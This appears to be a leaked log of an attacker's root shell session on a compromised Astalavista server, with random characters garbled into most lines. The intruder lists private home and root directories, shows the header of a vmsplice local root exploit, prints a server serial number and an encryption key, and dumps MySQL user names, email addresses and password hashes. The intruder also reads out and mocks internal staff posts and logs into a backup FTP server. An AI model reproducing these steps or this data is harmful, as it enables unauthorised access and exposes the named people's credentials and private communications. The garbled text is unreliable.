# G# @ G0 P1 H6 P' q+ K) G$ ~3 ?$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
' O+ S/ W" Z( H* b?>
" ^3 O; ]! ^( k5 V" y4 i. U. l) h' X6 K
sh-3.2# cd ..- X* }; H! A; W! Q$ X
sh-3.2# cd com
. B$ B: ^5 y" V; ^: g# _; h' Gsh-3.2# ls -la; I/ m5 @8 E" s* l
total 141208
& j( t" v! \9 A( B9 Mdrwx–x–x 10 com com 4096 Apr 28 12:40 .
% i: g: [+ B% fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ O" Q( ?0 ]0 V# Idrwx—— 2 com com 4096 Jun 4 04:04 backups
# [: ?5 l& i% h: d# ^4 w-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql" ^) ~; H% q: ]7 F4 {* A5 n' }; y. Q
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
* l9 E, X: h8 i" o% r( b: _( g3 q-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
* a/ _$ U$ c0 d' G s-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout" l8 |4 V$ h( _/ \2 w M
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile, x8 U) m7 Z9 `! B. a
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
- g1 S) R# }' z: Fdrwx–x–x 3 com com 4096 Jan 29 2008 domains, @! ~+ Z7 h$ O& T4 h9 z; t
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
+ m& l! [1 }- i$ p4 K0 z3 J: }drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
9 w- D! k! Q) R# d$ I- r-rw——- 1 com com 69 Nov 18 2008 .lesshst
6 ]$ O0 L8 O2 a, r0 i# i# ~2 Jdrwx—— 2 com com 4096 Sep 24 2007 mail
# R: O0 m$ ^+ f# Z* ]2 U; G) ^-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
8 L3 Q. W2 b6 U$ ^ Cdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp7 n0 f8 z- u. v E2 b, n
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
2 c+ L1 [. d& Y- _4 Z& O-rw-r—– 1 com mail 34 Sep 24 2007 .shadow& ]+ n8 O6 A s/ C
drwx—— 2 com com 4096 Aug 26 2008 .ssh
$ Z/ y v7 i4 O9 C4 C) l-rwx—— 1 com com 8515 Feb 10 2008 t
; v: c# O9 \0 m$ U) T-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
0 m% d/ T7 n4 M& d2 [% fdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp% u3 v S# v0 \ l8 O1 Y
-rw-rw-r– 1 com com 617 May 20 2008 .toprc, H+ C/ N& f! {4 ^9 l# i! e
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql2 _1 P" f' Y& t
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo3 K. l, w/ s# i2 C2 t0 n, n
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc: H* F, O0 a9 \; Z
3 ?* X1 ]7 }2 {+ l
sh-3.2# head t.c
0 o8 H0 e7 E0 o1 `! T! U, S/*
( t" W& T; E$ N& ?) f4 X% O* jessica_biel_naked_in_my_bed.c) `- \' w* e* ?: e! q5 f- r
*
2 m8 r9 m4 j7 x5 s8 n* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.. X- E( |6 X. @) f% B
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
| {4 A( x- V* I7 e4 D* Stejnak je to stare jak cyp a aj jakesyk rozbite.
" \* q4 t+ E4 S1 B. n) N# k& |*
' D- k* e/ Z# Z* Linux vmsplice Local Root Exploit; D2 B( ~2 ^* |# P
* By qaaz/ g$ }) u. n4 x
*/ F: U/ I0 e1 A/ a- f
U: b: O3 n8 _
sh-3.2# cd /
) D0 [! z. S* D$ S2 h3 i$ V9 _sh-3.2# ls -la
+ S- C6 j% h9 J o/ B5 S" J$ {total 3605 P0 H% K' `* Q/ T
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .2 G4 Z% _2 s$ ^+ c- I! z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
7 s" E \2 `1 |6 |4 D; ]1 O- g: i-rw——- 1 root root 10240 Jun 3 02:39 aquota.group: P' {. b% {8 c4 `/ U& j
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user9 B7 @6 I1 z! t. R2 f
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
7 W5 l+ q4 \$ u-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
2 N" {+ R( m/ Q1 \-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
& u3 p' J' ?) Ydrwxr-xr-x 3 root root 4096 Dec 29 2007 backup: L( Y$ m6 o3 L8 S+ r! X; t
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin3 r3 d2 y3 h$ i* }4 y- E; ?
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot7 H7 a6 Q5 V/ P, m$ _. o
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
6 \7 P' `3 j$ t, r( r6 F0 ddrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc+ d( D# Z6 ^" `! t
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home0 A5 N3 Z. S$ F% Y0 T
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf8 H2 W7 T2 \, t+ a+ W
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
9 }) [ E% N; h7 q! ^" P- ddrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64$ O6 m6 B! F3 f$ B
drwx—— 2 root root 16384 Sep 11 2007 lost+found/ R! V$ k$ X1 s6 o
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media2 d" H- V" h) L5 ]& ~% G
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc4 J+ f+ z# g0 W. a! w
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
- l5 s9 i- o3 K, n-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
: K# x: g6 ]% N+ x( T4 Kdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
f7 d; @5 L# Q8 F+ T6 V2 |1 Mdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
8 Q6 x. l+ k. }% {5 Udr-xr-xr-x 264 root root 0 Jun 3 02:42 proc$ [0 ^3 ~9 m8 V" d/ I
drwxr-x— 15 root root 4096 Jun 4 08:40 root' n7 {8 [4 x6 D
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin" a/ r2 d% x0 r- @) {7 b' y) K
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux9 n2 a6 S! q! O3 h! s( N" m
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
: P6 L# S( k8 r, |drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
+ S# t; f; \4 }( Z2 D0 h9 Hdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp$ F' s. L5 h& |& N& Q
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
! ^/ W( P, g" p6 D4 }: m% z% P2 J6 {* gdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
6 ?) ^- i8 d9 M( h/ T" M4 N* u [ p" Y9 Y5 G, d% b& |! u
sh-3.2# cd opt
5 b+ r% j' B2 Psh-3.2# ls -la
+ ^/ r+ L) M! Y) ?6 gtotal 20
2 e' T1 n4 c9 p: g( kdrwxr-xr-x 3 root root 4096 Mar 11 17:56 . a. V+ `& ~% Z- T8 r- E- N
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 C! F& s; c; ]& P8 |4 Pdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
* Z" R4 H8 D6 [- V9 R
. W" O9 V V/ L+ D9 Y. m& s3 b; ysh-3.2# cd lsws/
9 H0 c8 I, f. k* U% V0 E; }sh-3.2# ls -la
8 g" _ p! W, I& X9 q- f, M6 I4 H( Gtotal 108$ W' H2 \ d! Z& l
drwxr-xr-x 15 root root 4096 Mar 20 2008 .: C, X& j- Z9 q0 [ A- A% U
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
9 f% l+ o" G& V4 Cdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons8 \$ Y, G0 O- P# `
drwxr-xr-x 13 root root 4096 May 29 15:10 admin6 n! E2 ^' ]* ]* s
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
+ }; C) \, I$ x+ Z+ Y* Hdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
& w' h! r' N) ^drwx—— 4 apache apache 4096 Jun 3 02:43 conf
; E3 Y& l% ~8 Z6 Ldrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
' Z; y& M2 H- b3 F; |drwxr-xr-x 2 root root 4096 Sep 15 2008 docs! t* u$ I9 B) _) u* q7 R
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin! D/ K7 \8 q s/ Z0 q! Z
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib; n: t' h w4 I% c% h
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE' C# `2 l. o. f7 @! m
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
( t N+ ]- l Q% Z* K; \6 j( V-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
* ^$ }1 g' ^$ K+ v-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP8 y, x% N: _* x& H( g8 N
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
: I. L. G' m# pdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
+ R' Q6 z0 l" k+ F- xdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
# g, j" ^+ u7 I+ j* Ndrwxr-xr-x 3 root root 4096 Mar 20 2008 share
4 e/ g2 S! X: P5 W* E) K$ G-rw-r–r– 1 root root 6 May 29 15:10 VERSION
1 @! P9 W5 V% I' A$ O7 \$ `- f
+ P }, S. D! R- W/ m9 N6 ?. H, Tsh-3.2# cd conf( U; X! k! s1 J L
sh-3.2# ls -la0 G [# D" e q
total 480 d4 e7 z# ]" Z0 y& g5 k* W4 s9 w
drwx—— 4 apache apache 4096 Jun 3 02:43 .
5 d, [- E" a- f# I( O! wdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
8 v2 x0 K9 y* w* W Hdrwx—— 2 apache apache 4096 Mar 20 2008 cert. w8 a% v7 i# B. Y1 J+ @; q
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
) ^+ b4 B( a# N-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak/ W4 G; E* R3 o5 L
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last8 K6 g. W, a% T2 K: S, f
-rw——- 1 apache apache 256 May 29 15:10 license.key
u' }$ I# | S+ [+ z) W- ~-rw——- 1 apache apache 256 Mar 21 2008 license.key.old$ d- r3 c" r. R& l* h7 m
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties6 o/ K& N& f3 T4 O. Q1 m" v
-rw——- 1 apache apache 20 May 29 15:10 serial.no" }5 T9 n9 q# d) O1 V5 p, E0 e
drwx—— 2 apache apache 4096 Mar 20 2008 templates
& ^. M" t8 h3 h4 I. w0 `; C
J/ X3 \% z) hsh-3.2# cat serial.no% u8 T6 N3 R& r+ D" r- d
IbDl-oVsO-CKqL-wVRa
' J& ~9 e" N& o7 a$ z9 q& M* J% g/ K6 q/ U8 @; z3 @
sh-3.2# mysql
% S: `& Q0 f, h& m- rWelcome to the MySQL monitor. Commands end with ; or \g.5 W( R3 s0 u. }: C! X( N
Your MySQL connection id is 286844& F, `2 \) i# Q3 Z" t" X
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
2 N4 x- Y* A0 w, K4 A: @
3 ?+ {( Q+ T! A4 r* W) DType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.3 o: p/ y; Q1 O) _0 S
`% d2 h! P, @' ~0 o; p4 P
mysql> show databases;2 @" J- i- Y8 A9 X6 m+ X
+———————–+7 V8 G" E% v; n7 V" y, f0 B+ l
| Database |0 }" N- Y8 L5 g0 F
+———————–+2 b/ u# \+ W. u h: U
| information_schema |
% o3 D& y, c0 v, \| astanet_ads |5 c9 M! b, \( a. |. {. d
| astanet_mailing_lists |
3 B: u i8 t8 b" l1 X6 }| astanet_mediawiki |# Y8 u+ T4 f2 J( t. F. Q
| astanet_membersystem |; K4 a( k* X1 B
| com_contrexx |! |* J q& O0 H) f4 F5 h, A' l
| com_contrexx2 |* n/ I+ A- J* x6 m
| com_contrexx2_live |
* D s1 j4 G" U9 J% j+ }, K| da_roundcube |
?2 `: k" O$ _/ x: N| dolphin |
: M3 M& G1 u# J| ideapool |( m! }6 D% z3 @' {4 J, A0 i. L" {
| mysql |
7 X2 A2 M& {' g4 n/ b" F| test |
0 `" w# ^4 V4 V. M* @8 v| yourmaster |
% o6 D9 V) ]* z1 y% a- s \+———————–+
7 @, V! w8 ]+ }: ~ |14 rows in set (0.00 sec)
$ N- F- Z, Z" f" V
% Z% y8 R$ \& }! S) w. C2 v8 k6 Dmysql> use ideapool1 N3 f9 k3 N! Z: L, D8 K% n
Database changed
. i. d- h8 v: ~% Fmysql> show tables;9 }' G7 q t# X3 u) s/ C" J
+———————————–+
8 G I9 {* ^' c; [| Tables_in_ideapool |& R3 j0 E% u! Z
+———————————–+0 D, F. D4 t5 v5 ~4 B
| eventum_columns_to_display |
* \7 W1 m# _$ I9 |6 S# U# E| eventum_custom_field |
9 y* m; s$ Q7 `$ `) w| eventum_custom_field_option |
& w. I; d! `$ Z9 N: \| eventum_custom_filter |0 d1 V& s5 z1 K5 B
| eventum_customer_account_manager |& S0 y: \$ Z9 g" W
| eventum_customer_note |+ _# A- J: }" ]- m1 @" f( X
| eventum_email_account |6 C/ A) U2 y, D* h7 w# ]/ a
| eventum_email_draft |2 j2 T7 ~$ l1 Z7 F+ {
| eventum_email_draft_recipient |
7 n" n# Q# _% R1 k5 g8 }- B$ E8 s| eventum_email_response |5 u2 P# l4 z5 i% ^" g3 h+ ^
| eventum_faq |- d, V. ~9 d9 o* W) j( J
| eventum_faq_support_level |/ q' i6 |3 \* o; ]4 J/ V' s/ v
| eventum_group |1 |3 \! m' ~- e, {) }
| eventum_history_type |
! s9 N9 h( [$ l+ K0 S( u| eventum_irc_notice |1 L! A; V+ _' c' W, G4 N* ]1 x1 w
| eventum_issue |0 F+ j( Z; _5 A* Z" V1 A5 }
| eventum_issue_association |
6 R* p' x, D6 H; h6 u| eventum_issue_attachment |
" L8 o- ]+ ^# B' ~* S| eventum_issue_attachment_file |
7 }/ o4 k' s e8 r, C( ~| eventum_issue_checkin |
; |% O2 d6 _( y; a4 I: v/ F| eventum_issue_custom_field |
: O" @, b5 J N| eventum_issue_history |
, k$ k5 b5 H: T& s* V| eventum_issue_quarantine |
* v) y5 I s9 `$ p- x) Y& J| eventum_issue_requirement |3 d$ b R9 q Y' K: C1 x
| eventum_issue_user |# A& w7 G; q; B* R6 } j5 T5 [( L
| eventum_issue_user_replier | n% r' ~) I1 Q0 r
| eventum_link_filter |) F' @* ^" d. \0 R
| eventum_mail_queue |
F3 P1 z) c1 s$ w. ^) b; Z% x- L$ V| eventum_mail_queue_log |4 ]4 J' K" `& f- u
| eventum_news |* k T* p4 s2 ?0 r
| eventum_note |( V- `" r& @' H; W8 r: J
| eventum_phone_support |' d0 Y0 D. h. U0 I% r
| eventum_project |& j, I- q2 a+ D% I' G, l! p
| eventum_project_category |' H4 t( @3 c# K3 h' R+ }
| eventum_project_custom_field |
5 {& T: X5 U! r2 k1 p| eventum_project_email_response |
4 p/ n) O4 _, Y) ~& w| eventum_project_field_display |0 J% W) S, Z1 ]5 j5 G' ~
| eventum_project_group |
. G+ T; n s- y9 o| eventum_project_link_filter |, S( A8 t7 \: L
| eventum_project_news |
) a) g- w7 Z* V9 Q b0 A8 t| eventum_project_phone_category |
1 h9 P- R4 f& b5 L+ h1 e- ?| eventum_project_priority |% u4 \ ^1 A& P5 h7 x# q
| eventum_project_release |8 S' ~; y! ^5 z7 j2 a" F. w5 i( z
| eventum_project_round_robin |
8 m$ w4 I4 D& r; \& X0 f; d| eventum_project_status |
9 S0 V* O! [7 D5 r6 E| eventum_project_status_date |+ O9 q* W* r: I" M+ E
| eventum_project_user |
7 T8 t$ x3 I9 ^: P# ?| eventum_reminder_action |
6 l1 k2 \; L, o1 `- E! `| eventum_reminder_action_list |
6 M" H8 }+ `, y| eventum_reminder_action_type |
2 ^, m6 w& [' h, \| eventum_reminder_field |
2 L/ H) C$ Q$ g0 {| eventum_reminder_history |
0 ?0 V" O* M2 q! E7 U; E6 V$ V| eventum_reminder_level |
0 u/ M# c3 e2 R: p8 \- n| eventum_reminder_level_condition |, W# X" L4 v- M
| eventum_reminder_operator |; B" p, t" F4 }+ a, b$ g
| eventum_reminder_priority |
/ I9 P; ^1 I$ A| eventum_reminder_requirement |
( S3 v+ I% { b. |! I# _6 I| eventum_reminder_triggered_action |
6 Z! t% h, w; C2 c7 }0 a| eventum_resolution |& {0 ~- f# Q# h" c' J
| eventum_round_robin_user |
. C: _0 w8 v+ [| eventum_search_profile |& B. G. O7 ?1 J2 g- C
| eventum_status |
& h( l1 H/ h+ S9 ^| eventum_subscription |, P1 ^2 O( W% J3 y" [
| eventum_subscription_type |
5 o; f; k! k2 }/ ]; ]| eventum_support_email |9 p/ O" C0 u" q+ R
| eventum_support_email_body |
/ M4 |( a d$ S+ I6 @. D d( N9 K| eventum_time_tracking |7 g+ q2 [7 C' @0 X- H1 l' Y
| eventum_time_tracking_category |3 |, H- d0 g3 w ~9 S
| eventum_user |
: [+ b7 _, } K2 v* `, b+———————————–+
9 Z' y, s/ ^" h5 @- O% N69 rows in set (0.00 sec)
( a" [2 Z5 K4 d7 N) X }6 r) B; C3 ?
5 t2 D* I6 | ^2 t1 L9 M# rmysql> describe eventum_user;
; w7 s: ~5 q) G& @: j9 v+————————-+——————+——+—–+———————+—————-+2 k l9 @2 ^! N
| Field | Type | Null | Key | Default | Extra |) X! s, F6 j5 u6 q+ }' ?; ^6 A
+————————-+——————+——+—–+———————+—————-+
/ h/ J) C" `/ \* i| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
4 ^6 X) I- |2 Z+ Q4 S| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
* a& ~$ @' j9 O; a0 t' ?| usr_customer_id | int(11) unsigned | YES | | NULL | |
" [4 U0 Z. P* S, n7 W- |/ u| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
4 O- D0 M: s. C6 B2 z9 b* K: r| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
$ v) `" y1 g5 X( n| usr_status | varchar(8) | NO | | active | |
8 p4 H/ b- h7 b; Q4 p0 f| usr_password | varchar(32) | NO | | | |
7 E O/ @; Z" p| usr_full_name | varchar(255) | NO | | | |
$ v8 g7 l+ @# \" V2 I| usr_email | varchar(255) | NO | UNI | | |
$ y2 M8 L% V$ H# Y2 c3 _# _| usr_preferences | longtext | YES | | NULL | |; p8 a2 e9 h E6 J4 x9 i/ Y
| usr_sms_email | varchar(255) | YES | | NULL | |6 r$ W) r0 v0 R; x3 C" Z, t
| usr_clocked_in | tinyint(1) | YES | | 0 | |! x4 ?" J$ L, v; [+ d" n
| usr_lang | varchar(5) | YES | | NULL | |0 ?# ^' M! h- X3 P3 F
+————————-+——————+——+—–+———————+—————-+8 n5 Y% p& i+ e* l# r# b9 S3 z0 N
13 rows in set (0.00 sec)" W1 W7 R8 p. R1 z5 h( g9 n
& A$ Y3 n M7 a( F; S* \mysql> select usr_full_name,usr_email,usr_password from eventum_user;2 e7 B& A" j& H% {" h
+———————-+——————————-+———————————-+
}. ^. m8 F2 w( Y! ^1 x R" v3 [" b| usr_full_name | usr_email | usr_password |) H/ F$ S4 {) |# i$ \
+———————-+——————————-+———————————-+
- c( b& v0 |/ m; E1 O0 W+ I| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |, M3 ^, ~0 b/ j
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
8 v) u) \! x- s; s+ y| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |6 I# U& l& ]5 k0 J) b" }
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |8 c$ w0 P% m5 D/ H
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
4 z. a! m$ B1 t% J# || USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
% H/ t( b- p5 X6 s5 D* [| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |/ o/ S9 o4 l1 T1 m# ?
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
u, i7 H2 ]+ ^" P8 z4 l. ~$ Y$ k| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
& ]0 ~6 U7 _, l M& L' x| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
+ g: s* E o; A+ v| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |2 c# X$ {3 ?* {) H4 K3 `
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
2 M l$ c$ \3 i' O! p# V| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |% m+ @9 W3 M# j" F( B0 o# [$ H
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |, e; W9 g. `+ `( ^( y9 L1 Z$ n
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |; F k' `) M, k" o) P% B/ `
+———————-+——————————-+———————————-+% ?0 B7 M G& i$ l) B4 S: ?
15 rows in set (0.00 sec)% A& y# K* [* M5 m$ u
, P! I! F" H; k$ C8 F" f4 b$ v2 d6 P
mysql> select iss_description from eventum_issue where iss_id = 43;* {9 _9 U/ c/ f- K
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+4 `* N9 L' J, j" o, |8 j! w# M
| iss_description 5 c9 y! L' Y3 o2 L9 {! S, D/ D
|3 c+ F7 z! }$ @' V- G
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
/ l4 j6 _+ i5 S# E| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be* M! @1 E: S2 `# N0 X ~0 ]8 V
connected for 90 mins… 120mins… so what i propose is something like:
+ b- p$ P2 t) d0 f) ]8 F Y; w2 X4 A链接标记[url]http://www.surfthechannel.com/[/url]
8 J0 m I% E' R; Rsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
+ l* m1 z" M* H0 V6 w, V( _like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
$ E0 s0 f! R+ m! Z% g( o: x obreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off5 H% O4 i7 p0 P2 u
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…9 B! n& J7 S$ {! k3 F# D4 Q
$ \. B4 I; p4 L$ j
We could also put advertisement during play on the flash video player itself… extra $$…3 y0 U/ Q1 G% U
; R" ~" B* a* oBy sykadul |
) K/ d4 [6 g) P% v+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+$ N# Y- H4 s, a0 M! L- P
1 row in set (0.00 sec)
' C$ M4 \' x' a& r) Q6 I3 I, e: E+ ?7 C* D
// Money and extra $$ is all they care about. remember that.! S% S( f2 ]6 p' S7 J+ a
5 ~ i! t Y* C7 i3 R7 c
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
) Q7 m9 a3 n7 P8 B1 _+————————+——————————————————————————————————————————————————————————————————————————————-+
: I! P. L$ p \% Z6 z| iss_summary | iss_description
; Z! g. @. \- S9 c|3 s! y' C) F. Z! f- z4 D% S
+————————+——————————————————————————————————————————————————————————————————————————————-+$ g. u# Y7 C# e' N }% Y$ N
| Forum for REAL EXPERTS | Hello,
- W2 E+ r+ `1 E. u+ I* w1 z
6 H3 \$ y* V* [! Y! a1 {& RIshtus and I,. _4 o$ F& Z, ~4 S g. X
4 Q0 L3 D6 J* M- g. HCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
; o4 ]% M' b/ x' I# S2 eONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
4 [) \. z* i+ b* _. @4 i* E0 m8 z6 N1 c* M- \% @# i) s
One example a friend of mine from coresecurity.com!
# C9 ~8 u& |. l* M) f; d3 S- Y1 u1 O" }
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..4 {8 w! U: g" Z9 r, G6 B4 [
8 L3 Y- z! Q; r9 K" P|: w) Y" f6 }( V/ Q( k* X4 @
+————————+——————————————————————————————————————————————————————————————————————————————+ H. w1 G* ^) K+ B2 ~$ b3 o8 @
1 row in set (0.00 sec)
9 {4 D- G* L; }" Z' y9 }
7 k$ P6 W& Z7 @5 s# M2 v$ w) K// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
7 T9 z E3 O! Y5 `* B" Q& Z
& Q: O# s# d+ t6 s o) g# V: Qmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;4 E$ g# J. b5 k. m2 X. \. |0 [4 g
+——————+———————————————————————————————+
- u4 W) {5 u: B/ T2 p( L# V/ p9 _' k| iss_summary | iss_description |
0 n* e; A& I4 k6 C- H( g0 H% d+——————+———————————————————————————————+
2 H0 b/ Z+ j( Y( f| Website guidance | Virtual Girl which guides you trought the website.
( ~. C+ O7 p. z& {; A0 g5 k9 R! G# p0 V1 t5 A2 f Q
We need a girl with who you can ( talk )!!!3 r6 G, b" q5 g8 J, b
Also for the News!4 g9 f3 d" X3 Y3 D" |' ?5 C$ ~
So my suggestion is a girl who read you the news loud if you like!
7 a5 }$ d; C4 v- |2 k1 B* T1 ^" ryou can choose between read yourselfe or she read it for you or both!- w @- S7 N8 E/ W* \2 J
+ L6 b1 z6 m: x! s3 [4 |Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
" }3 u0 }, o+ p2 O
- U; Q' k- m8 v( ~! d/ kHave a look on the example girls!!
$ A* s$ f. C1 S7 L9 D6 H! ~5 r t0 k6 G5 j! V1 h7 T+ h" m
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]( W1 s& k t* W$ x
5 y: b* ~+ Q9 l& l( ^. l& D8 Y% c
or that
- m1 z. o) w% |! I7 `6 ^" ?
. R1 ~+ `* j( {9 r/ q- G V |链接标记[url]http://www.yellostrom.de/[/url]
) K/ K8 I# C. X3 f' e/ z, T3 v. [
|& c7 f; q$ [, \/ L
+——————+———————————————————————————————+, }! n K0 {' j/ t
1 row in set (0.00 sec). A. I% A! N5 \. Q4 D* ]
7 B0 R- s1 ?" p, \
// ha ha.
# X8 H7 r% r& N3 ?1 a- E$ [% K# [
( @ d+ p- y# j4 x3 Z7 f& \mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;! K: C$ h) k9 s
+————————–+———————————————————————————————————–+
! U1 D+ j E1 }, d0 U# K' j| iss_summary | iss_description |
3 d/ z2 E. @1 m5 ^+————————–+———————————————————————————————————–+9 e( l F _/ h& p- L8 b
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |% w/ A# i5 W' j1 A
+————————–+———————————————————————————————————–+3 B7 h; j: n4 j9 H
1 row in set (0.00 sec)
5 U8 M0 Z( W$ X8 a9 H: B# T; I% n7 Y
// LOL. _% C2 P3 U: f+ H
8 M: ]! @; ]" b5 K4 J& A6 p- T2 kmysql> exit
N( B/ S' M0 U8 p" sBye
0 }! G1 k1 R# [- H( u: O1 p% N1 l: m$ z( h
sh-3.2# ftp 212.254.194.163
# e3 W- v+ M- N; B8 g4 {! r( AConnected to 212.254.194.163.+ D2 }/ q) ~. ]( O/ A4 }9 l
220 BackupCOM_VW FTP server ready.% |! p9 T* O" \) Q
504 AUTH: security mechanism ‘GSSAPI’ not supported.
! {. y7 ?7 [5 |7 k504 AUTH: security mechanism ‘KERBEROS_V4′ not supported. A0 W9 c- S5 v) I1 ]( T9 k
KERBEROS_V4 rejected as an authentication type
1 Z1 ]+ ?1 s" {( z' OName (212.254.194.163:root): astalavista.com
* C4 m$ L; ^/ }+ Y" _1 G% l+ T331 Password required for astalavista.com.
, z' a {( N) TPassword:* Z% w* a+ P6 |% ]. L# Y* F
230 User astalavista.com logged in.
& x+ `6 m* M8 a$ l: gRemote system type is UNIX.( X; P: Z6 B" J; i' G" C9 \: b( a
Using binary mode to transfer files.) Y+ ], ]( i/ H6 v# L& e
ftp> ls -la& S6 C2 B1 f+ W" P5 e) p$ b; _2 k
227 Entering Passive Mode (212,254,194,163,2,188), i$ O" ]: ?# u/ S! b5 K$ K
150 Opening BINARY mode data connection for ‘file list’.. S6 E$ v7 Y5 a; ?* _
